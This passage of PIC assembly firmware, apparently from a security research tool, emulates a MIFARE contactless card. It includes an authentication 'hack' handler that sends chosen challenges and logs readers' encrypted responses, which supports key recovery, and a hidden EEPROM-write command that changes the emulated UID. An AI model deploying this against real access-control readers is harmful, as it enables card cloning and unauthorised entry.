	goto	MHACDeferred	; possibly phase II or III
; possibly phase I
	movlw	0x20		; 4 bytes total length
	subwf	Var_MD_BitCount, w
	goto	$ + 1
	movlw	0xFE		; TX waste sync & W prefetch
	btfss	STATUS, Z
	retlw	3			; TX waste in 4*T_inst
	andwf	Var_MD_Buf, w	; mask out the key index
	sublw	0x60		; cmd code
	btfss	STATUS, Z
	retlw	4			; TX waste in 4*T_inst
; OK, we take it - phase I confirmed (send the challenge)
	bsf		Var_Flags, CmdHandled	; command is handled
	bsf		Var_Flags, StayActive	; stay in Active state
	bsf		Var_Flags, CmdDeferred	; expect next processing
	movlw	DC_MFAuthHack1			; of phase II
	movwf	Var_Deferred_ID			; deferred process ID
; send challenge
	movlw	10 + 2 - 1	; waste time to TX since first call in 4*T_inst
; incl. time spent in one pass through the delaying cycle bellow
; as well as the ManchesterCoder prologue (2*4*T_inst), BUT minus one to conform
; with the repeat-until style of that delaying cycle
	subwf	Var_TxOffset, w
; we do not need to care about Carry here as the eventual wrap-around means adding 256 in fact,
; and this is a well defined interval extension according to ISO 14443-3A
; actually, we need mod 8 computation here as 8*4*4 = 128 and 128 is the base for ISO 14443-3A
; BUT (!!!) to handle longer start up intervals correctly, we shall use mod 32 range here	
	andlw	0x1F	
	btfsc	STATUS, Z
	movlw	0x08	; handles the zero time by using yet another congruence class member for 0
	nop				; waste time sync
	movwf	Var_Count2
	nop
	decfsz	Var_Count2, f
	goto	$ - 2
	banksel	Var_MC_BitCount	; bank 2
	movlw	0x24		; 36-bit transfer
	movwf	Var_MC_BitCount
	movlw	Var_MC_ActualChallenge	; data to send
	movwf	FSR
	goto	$ + 1			; TX sync
	call	ManchesterCoder	; transmit the actual challenge 
; print command ID, parameter, and the challenge
	bcf		STATUS, C
	rlf		Var_ACIndex, w
	banksel	EEADR		; bank 1
	movwf	EEADR
	rlf		EEADR, w
	addlw	EE_Challenge1
	movwf	EEADR		; prepare EEADR pointing to the challenge
	bcf		STATUS, RP0	; bank 0
	movf	Var_MD_Buf, w		; cmd code
	call	DPPrintByte
	movf	Var_MD_Buf + 1, w	; cmd parameters
	call	DPPrintByte
	movlw	':'			; data separator
	call	DPPrintChar
	bsf		STATUS, RP0	; bank 1 again
	bsf		EECON1, RD
	movf	EEDATA, w	; Challenge_0
	call	DPPrintByte
	incf	EEADR, f
	bsf		EECON1, RD
	movf	EEDATA, w	; Challenge_1
	call	DPPrintByte
	incf	EEADR, f
	bsf		EECON1, RD
	movf	EEDATA, w	; Challenge_2
	call	DPPrintByte
	incf	EEADR, f
	bsf		EECON1, RD
	movf	EEDATA, w	; Challenge_3
	call	DPPrintByte
	bcf		STATUS, RP0	; bank 0 for return
	return			; end of phase I
; possibly deferred phases follow
MHACDeferred:
	goto	$ + 1			; TX sync
	movlw	DC_MFAuthHack2
	subwf	Var_Deferred_ID, w
	btfsc	STATUS, Z
	goto	MHACPhase3
	movlw	DC_MFAuthHack1
	subwf	Var_Deferred_ID, w
	btfss	STATUS, Z
	retlw	4		; it was another command that was postponed
; phase II confirmed (process terminal response)
	bsf		Var_Flags, CmdHandled	; command is handled
	bsf		Var_Flags, StayActive	; stay in Active state
	bsf		Var_Flags, CmdDeferred	; expect next processing
	movlw	DC_MFAuthHack2			; of phase III
	movwf	Var_Deferred_ID			; deferred process ID
	movlw	':'			; data separator
	call	DPPrintChar
	movf	Var_MD_BitCount, w
	btfsc	STATUS, Z
	return				; nothing to process
	sublw	0x40
	movlw	'!'
	btfss	STATUS, Z
	call	DPPrintChar	; wrong length - print a warning symbol
	movlw	0x08		; print 8 bytes anyway
	movwf	Var_Count2
	movlw	Var_MD_Buf
	movwf	FSR
	bcf		STATUS, IRP	; bank 0, 1 for INDF
MHACProcessP2:
	movf	INDF, w		; take the actual byte
	call	DPPrintByte	; and print it (postponed method)
	incf	FSR, f
	decfsz	Var_Count2, f
	goto	MHACProcessP2
	call	FetchAC		; fetch next challenge for next auth. hack
	return				; end of phase II
; phase III confirmed (hope for HLTA encrypted or something like that)
MHACPhase3:
	bsf		Var_Flags, CmdHandled	; command is handled
	bcf		Var_Flags, StayActive	; return to IDLE/HALT halt state
	bcf		Var_Flags, CmdDeferred	; no more deferring
	movlw	':'			; data separator
	call	DPPrintChar
	movf	Var_MD_BitCount, w
	btfsc	STATUS, Z
	return				; nothing to process
	sublw	0x20
	movlw	'!'
	btfss	STATUS, Z
	call	DPPrintChar	; wrong length - print a warning symbol
	movlw	0x04		; print 4 bytes anyway
	movwf	Var_Count2
	movlw	Var_MD_Buf
	movwf	FSR
	bcf		STATUS, IRP	; bank 0, 1 for INDF
MHACProcessP3:
	movf	INDF, w		; take the actual byte
	call	DPPrintByte	; and print it (postponed method)
	incf	FSR, f
	decfsz	Var_Count2, f
	goto	MHACProcessP3
	return				; end of phase III
#endif	; FAKE_UART


;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; MIFARE NACK Cmd Handler
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Handles all those commands possibly done in MIFARE unauthenticated state.
; In this version, everything that is 4 bytes long (cmd, data, CRC) except HLTA
; is handled by NACK reply (0x04 as 4 bit only transmission).
; Actually this should be the last handler of all 4 bytes long cmd handlers
; except HLTA.
;
; Assumes BANK 0, returns in BANK 0.
; INPUT:
;	Var_MD_BitCount	...	lenght of input command packet in bits
;	Var_MD_Buf		... input command data
;	Var_TxOffset	... TX synchro offset
; OUTPUT:
;	Var_Flags:CmdHandled, Var_Flags: StayActive
;	W				... TX synchro offset delta
; AFFECTS (besides the output):
;	Var_Count2, FSR, W, STATUS, UART state
;	Var_MC_BitCount, Var_MC_Buf, Var_MC_Mask (plus the others used for ManchesterCoder)

MifareNACKCmd:

	movlw	0x20		; 4 bytes total length
	subwf	Var_MD_BitCount, w
	nop					; TX waste sync
	btfss	STATUS, Z
	retlw	2			; TX waste in 4*T_inst
	movlw	0x50		; react on everything except HLTA
	subwf	Var_MD_Buf, w
	btfsc	STATUS, Z
	retlw	3			; TX waste sync
	bsf		Var_Flags, CmdHandled	; we take it
	bcf		Var_Flags, StayActive	; return to IDLE/HALT halt after completion
	movlw	8 + 2 - 1	; waste time to TX since first call in 4*T_inst
; incl. time spent in one pass through the delaying cycle bellow
; as well as the ManchesterCoder prologue (2*4*T_inst), BUT minus one to conform
; with the repeat-until style of that delaying cycle
	subwf	Var_TxOffset, w
; we do not need to care about Carry here as the eventual wrap-around means adding 256 in fact,
; and this is a well defined interval extension according to ISO 14443-3A
; actually, we need mod 8 computation here as 8*4*4 = 128 and 128 is the base for ISO 14443-3A
; BUT (!!!) to handle longer start up intervals correctly, we shall use mod 32 range here	
	andlw	0x1F	
	btfsc	STATUS, Z
	movlw	0x08	; handles the zero time by using yet another congruence class member for 0
	nop				; waste time sync
	movwf	Var_Count2
	nop
	decfsz	Var_Count2, f
	goto	$-2
	banksel	Var_MC_BitCount	; bank 2
	movlw	0x04		; 4-bit transfer
	movwf	Var_MC_BitCount
	movwf	Var_MC_Buf		; data to send - also 4 (NACK)
	movlw	Var_MC_Buf
	movwf	FSR
	call	ManchesterCoder
	bcf		STATUS, RP0
	bcf		STATUS, RP1	; bank 0 for return

#ifdef FAKE_UART
	banksel	TXREG
	SendUARTByte	'N'	; identify successful NACK cmd
#endif

	return


;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; WriteEE Cmd Handler
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; If WriteEE cmd is detected in the receiver buffer, the EEPROM variables
; are set accordingly.
; The command is done in silence, so the reader will probably reply saying
; the card is no responding or missing. However, e.g. the new UID can be checked
; easily be the reader select command.
; The command itself is based on a non-standard format of the reserved command 99.
; The markants are: Arithmetic checksum instead of XOR, one byte in the CRC field
; instead of two.
; The whole 8 bytes long command format is this: 99 ADR LEN B_0 B_1 B_2 B_3 CHK.
;	 99 ... command code (reserved SEL)
;	ADR ... starting offset in the EEPROM
;	LEN ... number of bytes out of B_0 ... B_3 to write starting at ADR
;	B_i ... bytes to write in EE
; 			there are allways 4 bytes regardless the LEN the rest of them are 
;			ignored BUT their are still included in CHCK!!!
;	CHK ... arithmetic checksum (99 + ADR + LEN + B_i) mod 256
;	
; Note that the reader shall be instructed to use parity bits and no CRC.
;
; Assumes BANK 0. Returns in BANK 0.
; INPUT:
;	Var_MD_BitCount	...	lenght of input command packet in bits
;	Var_MD_Buf		... input command data
;	Var_TxOffset	... TX synchro offset
; OUTPUT:
;	Var_Flags:CmdHandled, Var_Flags: StayActive
;	W				... TX synchro offset delta
; AFFECTS (besides the output):
;	Var_Count2, FSR, W, STATUS, UART state, EEADR, EEDATA

WriteEECmd:

	movlw	0x40		; 8 bytes total length
	subwf	Var_MD_BitCount, w
	nop					; Tx waste sync
	btfss	STATUS, Z
	retlw	2			; Tx waste in 4*T_inst
	movlw	0x99				; cmd code
	subwf	Var_MD_Buf, w		; it has to be in the head
	btfss	STATUS, Z
	retlw	3			; Tx waste in 4*T_inst
	bsf		Var_Flags, CmdHandled	; OK we take it anyway, now
	bcf		Var_Flags, StayActive	; return to IDLE/HALT state after completion
; verify the arithmetic checksum value
	movlw	0x99				; cmd code
	addwf	Var_MD_Buf + 1, w	; ADR
	addwf	Var_MD_Buf + 2, w	; LEN
	addwf	Var_MD_Buf + 3, w	; B_0
	addwf	Var_MD_Buf + 4, w	; B_1
	addwf	Var_MD_Buf + 5, w	; B_2
	addwf	Var_MD_Buf + 6, w	; B_3
	subwf	Var_MD_Buf + 7, w	; -CHCK
	btfss	STATUS, Z
	return
; store the data in EEPROM
	movlw	Var_MD_Buf + 3
	movwf	FSR				; B_0 offset
	bcf		STATUS, IRP		; bank 0,1 for INDF
	movf	Var_MD_Buf + 2, w	; LEN
	movwf	Var_Count2
	addlw	0xFB			; elementary integrity
	btfsc	STATUS, C		; checks
	return					; it must be < 5
	addlw	0x05			; and nonzero
	btfsc	STATUS, Z
	return
	movf	Var_MD_Buf + 1, w	; ADR 
	bsf		STATUS, RP0		; bank 1
	movwf	EEADR			; target offset setup
	bsf		EECON1, WREN	; enable write
WEEC1:
	movf	INDF, w			; B_i
	movwf	EEDATA
	movlw	0x55		; required sequence start
	movwf	EECON2
	movlw	0xAA
	movwf	EECON2
	bsf		EECON1, WR	; required sequence stop
	btfsc	EECON1, WR
	goto	$-1			; wait for write completion
	incf	FSR, f
	incf	EEADR, f
	decfsz	Var_Count2, f
	goto	WEEC1		; store it byte by byte
	bcf		EECON1, WREN	; disable write
	bcf		STATUS, RP0		; bank 0

#ifdef FAKE_UART
	banksel	TXREG
	SendUARTByte	'W'	; identify successful WriteEE cmd
#endif

	return
		
	
end
